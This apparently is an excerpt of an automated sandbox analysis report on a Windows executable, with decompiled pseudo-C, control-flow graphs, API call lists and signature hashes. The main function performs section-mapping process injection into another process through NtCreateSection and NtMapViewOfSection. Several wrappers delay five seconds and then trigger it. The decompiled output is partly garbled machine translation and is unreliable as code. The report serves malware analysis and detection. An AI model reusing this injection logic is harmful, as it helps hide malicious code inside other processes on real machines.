                            control_flow_graph 397 401617-40162b call 401274 401 401630-401635 397->401 402 40162d 397->402 404 401956-40195e 401->404 405 40163b-40164c 401->405 402->401 404->401 408 401963-4019b3 call 401274 404->408 409 401652-40167b 405->409 410 401954 405->410 409->410 417 401681-401698 NtDuplicateObject 409->417 410->408 417->410 419 40169e-4016c2 NtCreateSection 417->419 421 4016c4-4016e5 NtMapViewOfSection 419->421 422 40171e-401744 NtCreateSection 419->422 421->422 425 4016e7-401703 NtMapViewOfSection 421->425 422->410 426 40174a-40174e 422->426 425->422 427 401705-40171b 425->427 426->410 428 401754-401775 NtMapViewOfSection 426->428 427->422 428->410 431 40177b-401797 NtMapViewOfSection 428->431 431->410 434 40179d call 4017a2 431->434
                            C-Code - Quality: 58%
                            			E00401617(void* __edx, void* __esi, void* __eflags) {
				void* _t85;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t131;
				signed int _t138;
				int _t139;
				void* _t156;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				void* _t165;
				intOrPtr* _t166;
				void* _t169;
				intOrPtr _t179;
				void* _t180;
				void* _t181;
				HANDLE* _t187;
				HANDLE* _t189;
				void* _t194;
				intOrPtr* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				void* _t207;
				long _t222;

				_pop(ss);
				L00401274(_t85, __edx, __esi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
				_t187 = _t201 - 0x60;
				 *_t187 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
				_t91 =  *_t187;
				if(_t91 != 0) {
					_t131 = _t201 - 0x30;
					 *_t131 = _t91;
					_t131[1] = 0;
					_t187 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t201 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t201 - 8)) = 0;
						_t99 = _t201 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t189 = _t201 - 0x54;
						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t122 = _t201 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t201 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
								}
							}
						}
						_t101 = _t201 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t103 = _t201 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t201 - 0x40;
								 *_t105 = 0;
								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
								if(_t222 == 0) {
									L16();
									if(_t222 == 0 && _t222 != 0) {
										asm("hlt");
										_push(_t203);
									}
									_push(0x2ea6);
									_t207 = _t203 + 4;
									_t160 = 0x2260;
									_t161 = _t160 << 5;
									_t162 = _t161 + 0x2260;
									asm("lodsb");
									_t163 = _t162;
									asm("loop 0xffffffc4");
									_t164 = _t163 ^ 0xad610a21;
									_t203 = _t207 - _t164;
									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t138 =  *(_t194 + 6) & 0x0000ffff;
									_push(_t194);
									_t165 = _t194;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t166 = _t165 + 0xf8;
										__eflags = _t166;
									} else {
										_t166 = _t165 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t166 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
										_t203 = _t203 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t187);
									_t226 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t187);
										_t169 = _t187[0xd] -  *(_t201 - 0x40);
										_t197 = _t187[0x28] +  *(_t201 - 0x48);
										__eflags = _t197;
										while(1) {
											__eflags =  *_t197;
											if( *_t197 == 0) {
												break;
											}
											_t179 =  *_t197;
											_t197 = _t197 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t169;
												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t187);
										__eflags = 0;
										_t109 = _t201 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
									} else {
										L49();
										_pop(_t180);
										_t181 = _t180 - 0x1892;
										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
										L004012E3(_t128, _t226);
										0x33(_t181 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t203;
				_push(0x392);
				_t156 = 0xf1;
				return L00401274(_t92, _t156, _t187, _t226);
			}







































                            0x00401617
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                            • Instruction ID: 57dcf3cccefe6a0511f6925536cc6eed8aa77802ca08ef68a5075aa0b4e04b8e
                            • Opcode Fuzzy Hash: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                            • Instruction Fuzzy Hash: 2851E8B5900249BBEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6709944CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040A22A Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 436 40a22a-40a243 438 40a245-40a248 436->438 439 40a25d-40a261 436->439 440 40a2ed-40a2ef 438->440 441 40a263-40a278 call 40b014 439->441 442 40a24d-40a24f 439->442 441->438 449 40a27a-40a281 441->449 443 40a251 442->443 444 40a252-40a259 call 40b5e0 442->444 443->444 444->439 450 40a2c5-40a2c8 449->450 451 40a283-40a290 call 40b5e0 450->451 452 40a2ca-40a2e9 450->452 457 40a292-40a295 call 40b014 451->457 458 40a2c3 451->458 456 40a2eb-40a2ec 452->456 456->440 460 40a29a-40a2a0 457->460 458->450 461 40a2f0-40a305 460->461 462 40a2a2-40a2af call 40b4db 460->462 461->456 466 40a2c0 462->466 467 40a2b1-40a2bd 462->467 466->458 467->466
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.346386046.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_409000_file.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID:
                            • API String ID: 3494438863-0
                            • Opcode ID: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction ID: dc71ed7466da9eb0705fe63e25281e957772f9b53f43e374e1b7511a8f985a56
                            • Opcode Fuzzy Hash: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction Fuzzy Hash: EC2107B28083006AD7215B706C05B672794EB8133AF2906BFF950763D2EB7F8891865E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004019B6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 469 4019b6-4019d9 473 4019e1-401a20 call 401274 Sleep call 4014db 469->473 474 4019ea 469->474 483 401a22-401a2a call 4015d5 473->483 484 401a2f-401a81 call 401274 473->484 474->473 483->484
                            C-Code - Quality: 24%
                            			E004019B6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v3;
				intOrPtr _v8;
				intOrPtr* __ebx;
				void* __edi;
				void* __esi;
				char* __ebp;

				_push(0x1a03);
				asm("les eax, [ebx+ebp*8]");
				 *__eax =  *__eax + __al;
				__edx = 0x3a;
				__eax = L00401274(__eax, __edx, __esi, __eflags);
				__ebx = _a4;
				Sleep(0x1388);
				_push(__ebx);
				asm("sbb al, 0x8d");
				__ebp =  &_v3;
				asm("cld");
				_push(__eax);
				_push(_a12);
				_push(_a8);
				_push(__ebx); // executed
				__eax = L004014DB(__ebx, __edi, __esi); // executed
				__eflags = __eax;
				if(__eflags != 0) {
					__eax = E004015D5(__eflags, __ebx, __eax, _v8, _a16); // executed
				}
				__eax =  *__ebx(0xffffffff, 0);
				_push(0x1a03);
				__eax =  *__esp;
				__esp = __esp + 4;
				_push(0x7a);
				__esp = __esp + 4;
				__edx = 0x3a;
				return __eax;
			}









                            0x004019c7
                            0x004019d0
                            0x004019e4
                            0x004019f6
                            0x004019fe
                            0x00401a03
                            0x00401a0b
                            0x00401a0c
                            0x00401a0d
                            0x00401a0f
                            0x00401a10
                            0x00401a11
                            0x00401a12
                            0x00401a15
                            0x00401a18
                            0x00401a19
                            0x00401a1e
                            0x00401a20
                            0x00401a2a
                            0x00401a2a
                            0x00401a33
                            0x00401a3c
                            0x00401a41
                            0x00401a44
                            0x00401a55
                            0x00401a5a
                            0x00401a6c
                            0x00401a81

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                            • Instruction ID: eb9b8508e323ec0cad1531328720b9b31e587639ee963e529393297323997007
                            • Opcode Fuzzy Hash: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                            • Instruction Fuzzy Hash: 5E11ACB170D204FBDB00AA958C92EAA3668AB41350F208137F643790F0D57D9A13EB6F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004019C1 Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 498 4019c1-4019d8 500 4019e1-401a20 call 401274 Sleep call 4014db 498->500 501 4019ea 498->501 510 401a22-401a2a call 4015d5 500->510 511 401a2f-401a81 call 401274 500->511 501->500 510->511
                            C-Code - Quality: 37%
                            			E004019C1(intOrPtr* __eax, void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				void* _t11;
				void* _t12;
				signed char _t14;
				signed char _t17;
				intOrPtr* _t19;
				intOrPtr* _t21;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				signed char* _t34;
				intOrPtr* _t40;

				_t29 = __esi;
				_t27 = __edi;
				_t11 = __ebx;
				_t21 = __eax;
				if(__eflags >= 0) {
					 *(__ebx + 0x1a0368) =  *(__ebx + 0x1a0368) ^ __esi;
					_push(0x1a03);
					_t17 =  *_t34;
					asm("les eax, [ebx+ebp*8]");
					_t19 = (_t17 & 0x00000083) + 0xefebec34;
					_t40 = _t19;
					 *_t19 =  *_t19 + _t19;
					_t26 = 0x3a;
					_t11 = L00401274(_t19, _t26, __esi, _t40);
					_t21 =  *((intOrPtr*)(_t31 + 8));
					Sleep(0x1388);
				}
				_push(_t21);
				asm("sbb al, 0x8d");
				_t32 = _t31 + 1;
				asm("cld");
				_push(_t11);
				_push( *((intOrPtr*)(_t32 + 0x10)));
				_push( *((intOrPtr*)(_t32 + 0xc)));
				_push(_t21); // executed
				_t12 = L004014DB(_t21, _t27, _t29); // executed
				_t41 = _t12;
				if(_t12 != 0) {
					E004015D5(_t41, _t21, _t12,  *((intOrPtr*)(_t32 - 4)),  *((intOrPtr*)(_t32 + 0x14))); // executed
				}
				 *_t21(0xffffffff, 0);
				_push(0x1a03);
				_t14 =  *_t34;
				_push(0x7a);
				return L00401274(_t14, 0x3a, _t29, _t41);
			}















                            0x004019c1
                            0x004019c1
                            0x004019c1
                            0x004019c1
                            0x004019c2
                            0x004019c4
                            0x004019c7
                            0x004019cc
                            0x004019d0
                            0x004019d3
                            0x004019d3
                            0x004019e4
                            0x004019f6
                            0x004019fe
                            0x00401a03
                            0x00401a0b
                            0x00401a0b
                            0x00401a0c
                            0x00401a0d
                            0x00401a0f
                            0x00401a10
                            0x00401a11
                            0x00401a12
                            0x00401a15
                            0x00401a18
                            0x00401a19
                            0x00401a1e
                            0x00401a20
                            0x00401a2a
                            0x00401a2a
                            0x00401a33
                            0x00401a3c
                            0x00401a41
                            0x00401a55
                            0x00401a81

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                            • Instruction ID: bc127a57cd23688ba61662e4244e13cd0ea45db4b64a25b4eed15f00afb0d5a5
                            • Opcode Fuzzy Hash: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                            • Instruction Fuzzy Hash: 95118E7170D240EBDB019AA4CD92EAA3764AB45350F2081BBF547790F1C67D9613EF1B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401A39 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 525 401a39 526 401a3c-401a81 call 401274 525->526 527 4019ce-401a20 call 401274 Sleep call 4014db 525->527 547 401a22-401a2a call 4015d5 527->547 548 401a2f-401a4b 527->548 547->548 548->526
                            C-Code - Quality: 31%
                            			E00401A39(signed int __eax, void* __edi, void* __esi) {
				intOrPtr* _t9;
				void* _t10;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;

				_t24 = __esi;
				asm("les eax, [ebx+ebp*8]");
				_t9 = (__eax & 0x00000083) + 0xefebec34;
				_t33 = _t9;
				 *_t9 =  *_t9 + _t9;
				_t20 = 0x3a;
				_t10 = L00401274(_t9, _t20, __esi, _t33);
				_t16 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_push(_t16);
				asm("sbb al, 0x8d");
				_t27 = _t26 + 1;
				asm("cld");
				_push(_t10);
				_push( *((intOrPtr*)(_t27 + 0x10)));
				_push( *((intOrPtr*)(_t27 + 0xc)));
				_push(_t16); // executed
				_t11 = L004014DB(_t16, __edi, _t24); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					E004015D5(_t34, _t16, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
				}
				 *_t16(0xffffffff, 0);
				_push(0x1a03);
				_t13 =  *_t29;
				_push(0x7a);
				return L00401274(_t13, 0x3a, _t24, _t34);
			}













                            0x00401a39
                            0x004019d0
                            0x004019d3
                            0x004019d3
                            0x004019e4
                            0x004019f6
                            0x004019fe
                            0x00401a03
                            0x00401a0b
                            0x00401a0c
                            0x00401a0d
                            0x00401a0f
                            0x00401a10
                            0x00401a11
                            0x00401a12
                            0x00401a15
                            0x00401a18
                            0x00401a19
                            0x00401a1e
                            0x00401a20
                            0x00401a2a
                            0x00401a2a
                            0x00401a33
                            0x00401a3c
                            0x00401a41
                            0x00401a55
                            0x00401a81

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                            • Instruction ID: 3e21701bb5f0e512797832e813f874bbfc20ecba1c70a9a875b4590e50435436
                            • Opcode Fuzzy Hash: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                            • Instruction Fuzzy Hash: 1F016971709104EBDB00AA94CD92AAA3264AB45350F20817BF643B90F0D63D9A13EB1F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004019E8 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 552 4019e8-401a20 call 401274 Sleep call 4014db 558 401a22-401a2a call 4015d5 552->558 559 401a2f-401a81 call 401274 552->559 558->559
                            C-Code - Quality: 31%
                            			E004019E8(intOrPtr* __eax, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t9;
				intOrPtr _t11;
				intOrPtr* _t14;
				void* _t18;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr* _t28;

				_t22 = __esi;
				_t7 = __eax;
				_t25 = _t24 - 1;
				asm("invalid");
				 *__eax =  *__eax + __eax;
				_t18 = 0x3a;
				_t8 = L00401274(_t7, _t18, __esi, __eflags);
				_t14 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t14);
				asm("sbb al, 0x8d");
				_t26 = _t25 + 1;
				asm("cld");
				_push(_t8);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t14); // executed
				_t9 = L004014DB(_t14, __edi, _t22); // executed
				_t33 = _t9;
				if(_t9 != 0) {
					E004015D5(_t33, _t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				_push(0x1a03);
				_t11 =  *_t28;
				_push(0x7a);
				return L00401274(_t11, 0x3a, _t22, _t33);
			}












                            0x004019e8
                            0x004019e8
                            0x004019e8
                            0x004019e9
                            0x004019e4
                            0x004019f6
                            0x004019fe
                            0x00401a03
                            0x00401a0b
                            0x00401a0c
                            0x00401a0d
                            0x00401a0f
                            0x00401a10
                            0x00401a11
                            0x00401a12
                            0x00401a15
                            0x00401a18
                            0x00401a19
                            0x00401a1e
                            0x00401a20
                            0x00401a2a
                            0x00401a2a
                            0x00401a33
                            0x00401a3c
                            0x00401a41
                            0x00401a55
                            0x00401a81

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                            • Instruction ID: 7b7b6cc2fe2900c275b7dd1747d7b1898519f5b928d3d531ab9a34503a4fca0f
                            • Opcode Fuzzy Hash: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                            • Instruction Fuzzy Hash: BE018432709244EBDF00AA949C41EAA3764EB46350F20857BF603790F1D53D9712EF1B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E004019FD(void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				intOrPtr _t12;
				intOrPtr* _t15;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t22 = __esi;
				_t8 = _t7;
				_t9 = L00401274(_t8, __edx, __esi, __eflags);
				_t15 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_push(_t15);
				asm("sbb al, 0x8d");
				_t25 = _t24 + 1;
				asm("cld");
				_push(_t9);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t15); // executed
				_t10 = L004014DB(_t15, __edi, _t22); // executed
				_t32 = _t10;
				if(_t10 != 0) {
					E004015D5(_t32, _t15, _t10,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t15(0xffffffff, 0);
				_push(0x1a03);
				_t12 =  *_t27;
				_push(0x7a);
				return L00401274(_t12, 0x3a, _t22, _t32);
			}












                            0x004019fd
                            0x004019fd
                            0x004019fe
                            0x00401a03
                            0x00401a0b
                            0x00401a0c
                            0x00401a0d
                            0x00401a0f
                            0x00401a10
                            0x00401a11
                            0x00401a12
                            0x00401a15
                            0x00401a18
                            0x00401a19
                            0x00401a1e
                            0x00401a20
                            0x00401a2a
                            0x00401a2a
                            0x00401a33
                            0x00401a3c
                            0x00401a41
                            0x00401a55
                            0x00401a81

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                            • Instruction ID: 733ad67ec3470f7c6e230ccf9a96fa2733df2227e0d514dfe6a1d91c756ccb5a
                            • Opcode Fuzzy Hash: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                            • Instruction Fuzzy Hash: A1F03C3570A204EBDF00AA959C41EAA3624AB45354F208577B603B91F1D67D9A12AF2B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

